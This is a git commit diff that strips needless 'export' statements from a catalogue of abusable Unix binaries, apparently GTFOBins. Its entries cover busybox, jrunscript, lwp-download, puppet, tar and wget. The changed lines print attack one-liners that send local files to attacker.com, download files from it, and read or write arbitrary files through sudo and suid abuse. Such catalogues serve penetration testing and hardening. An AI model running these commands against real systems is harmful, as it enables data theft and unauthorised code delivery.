Remove some useless instances of export

This commit is contained in:
Andrea Cardaci 2020-06-10 23:04:59 +02:00
parent 9aa7ec842e
commit 45308d4f58
6 changed files with 21 additions and 21 deletions

View File

@ -6,7 +6,7 @@ functions:
file-upload: file-upload:
- description: Serve files in the local folder running an HTTP server. - description: Serve files in the local folder running an HTTP server.
code: | code: |
export LPORT=12345 LPORT=12345
busybox httpd -f -p $LPORT -h . busybox httpd -f -p $LPORT -h .
file-write: file-write:
- code: | - code: |

View File

@ -22,8 +22,8 @@ functions:
file-download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
export LFILE=file_to_save LFILE=file_to_save
jrunscript -e "cp('$URL','$LFILE')" jrunscript -e "cp('$URL','$LFILE')"
file-write: file-write:
- code: jrunscript -e 'var fw=new java.io.FileWriter("./file_to_write"); fw.write("DATA"); fw.close();' - code: jrunscript -e 'var fw=new java.io.FileWriter("./file_to_write"); fw.write("DATA"); fw.close();'

View File

@ -14,6 +14,6 @@ functions:
sudo: sudo:
- code: | - code: |
URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
export LFILE=file_to_save LFILE=file_to_save
sudo lwp-download $URL $LFILE sudo lwp-download $URL $LFILE
--- ---

View File

@ -6,12 +6,12 @@ functions:
file-write: file-write:
- description: The file path must be absolute. - description: The file path must be absolute.
code: | code: |
export LFILE="/tmp/file_to_write" LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'DATA' }" puppet apply -e "file { '$LFILE': content => 'DATA' }"
file-read: file-read:
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed. - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
code: | code: |
export LFILE=file_to_read LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE puppet filebucket -l diff /dev/null $LFILE
sudo: sudo:
- code: | - code: |

View File

@ -14,17 +14,17 @@ functions:
file-upload: file-upload:
- description: This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). - description: This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
code: | code: |
export RHOST=attacker.com RHOST=attacker.com
export RUSER=root RUSER=root
export RFILE=/tmp/file_to_send.tar RFILE=/tmp/file_to_send.tar
export LFILE=file_to_send LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh
file-download: file-download:
- description: This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions). - description: This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the `rmt` utility installed (it should be present by default in Debian-like distributions).
code: | code: |
export RHOST=attacker.com RHOST=attacker.com
export RUSER=root RUSER=root
export RFILE=/tmp/file_to_get.tar RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
file-write: file-write:
- description: This only works for GNU tar. - description: This only works for GNU tar.

View File

@ -3,25 +3,25 @@ functions:
file-upload: file-upload:
- description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. - description: Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data.
code: | code: |
export URL=http://attacker.com/ URL=http://attacker.com/
export LFILE=file_to_send LFILE=file_to_send
wget --post-file=$LFILE $URL wget --post-file=$LFILE $URL
file-download: file-download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
export LFILE=file_to_save LFILE=file_to_save
wget $URL -O $LFILE wget $URL -O $LFILE
suid: suid:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
export LFILE=file_to_save LFILE=file_to_save
./wget $URL -O $LFILE ./wget $URL -O $LFILE
sudo: sudo:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get URL=http://attacker.com/file_to_get
export LFILE=file_to_save LFILE=file_to_save
sudo wget $URL -O $LFILE sudo wget $URL -O $LFILE
--- ---